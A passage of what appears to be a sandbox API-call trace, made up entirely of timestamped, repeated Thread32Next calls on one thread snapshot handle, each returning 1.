returned 1 [0291.611] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.612] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.613] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.613] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.614] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.614] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.615] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.615] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.616] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.617] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.618] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.618] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.619] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.620] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.621] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.621] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.622] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.623] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.623] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.624] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.625] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.625] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.626] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.627] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.629] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.629] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.782] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.783] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.784] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.785] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.786] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.787] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.788] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.789] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.789] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.790] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.793] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.793] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.796] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.798] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.801] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.805] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.808] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.809] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.812] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.815] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.973] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.974] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.975] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.976] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.977] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.979] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.980] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.981] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.982] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.983] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.984] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.985] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.986] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.987] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.989] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.992] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.996] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.998] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0291.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.003] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.194] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.195] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.196] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.197] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.198] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.198] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.199] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.200] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.201] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.202] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.203] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.204] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.205] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.206] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.207] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.207] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.208] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.209] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.210] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.211] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.212] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.213] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.214] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.215] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.216] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.217] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.218] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.219] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.220] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.220] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.221] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.223] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.224] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.227] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.228] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.228] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.229] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.230] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.231] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.231] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.232] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.233] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.533] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.534] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.537] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.538] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.543] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.544] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.547] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.553] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.554] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.725] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.726] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.727] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.728] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.729] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.730] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.731] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.732] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.733] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.734] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.735] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.736] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.737] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.738] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.739] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.740] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.741] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.742] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.743] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.744] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.745] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.746] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.747] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.748] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.749] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.750] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.750] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.877] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.878] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.879] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.880] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.882] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.883] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.884] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.885] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.886] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.888] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.889] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.889] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.890] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.891] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.892] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.893] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.894] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.895] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.896] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.897] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.897] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.898] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.899] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.900] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.901] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.902] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.904] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0292.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.048] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.049] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.050] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.051] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.051] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.052] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.053] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.054] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.055] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.056] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.057] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.058] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.059] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.059] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.060] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.061] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.061] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.062] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.063] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.065] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.065] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.066] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.067] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.067] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.068] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.069] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.070] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.072] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.072] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.073] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.074] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.074] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.075] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.076] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.077] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.078] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.079] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.079] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.080] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.081] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.082] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.239] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.240] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.240] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.241] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.242] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.243] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.243] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.244] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.245] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.247] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.248] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.249] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.250] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.251] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.252] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.252] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.253] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.254] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.254] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.255] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.256] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.257] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.258] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.258] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.259] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.259] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.260] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.261] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.262] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.262] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.263] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.264] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.265] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.266] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.267] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.269] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.270] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.271] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.272] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.273] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.410] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.411] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.412] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.413] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.414] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.415] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.417] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.418] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.419] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.420] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.421] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.423] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.424] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.425] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.426] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.428] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.429] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.431] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.432] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.433] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.435] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.436] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.437] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.438] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.439] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.440] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.442] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.443] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0293.444] Thread32Next (hSnapshot=0x17c, 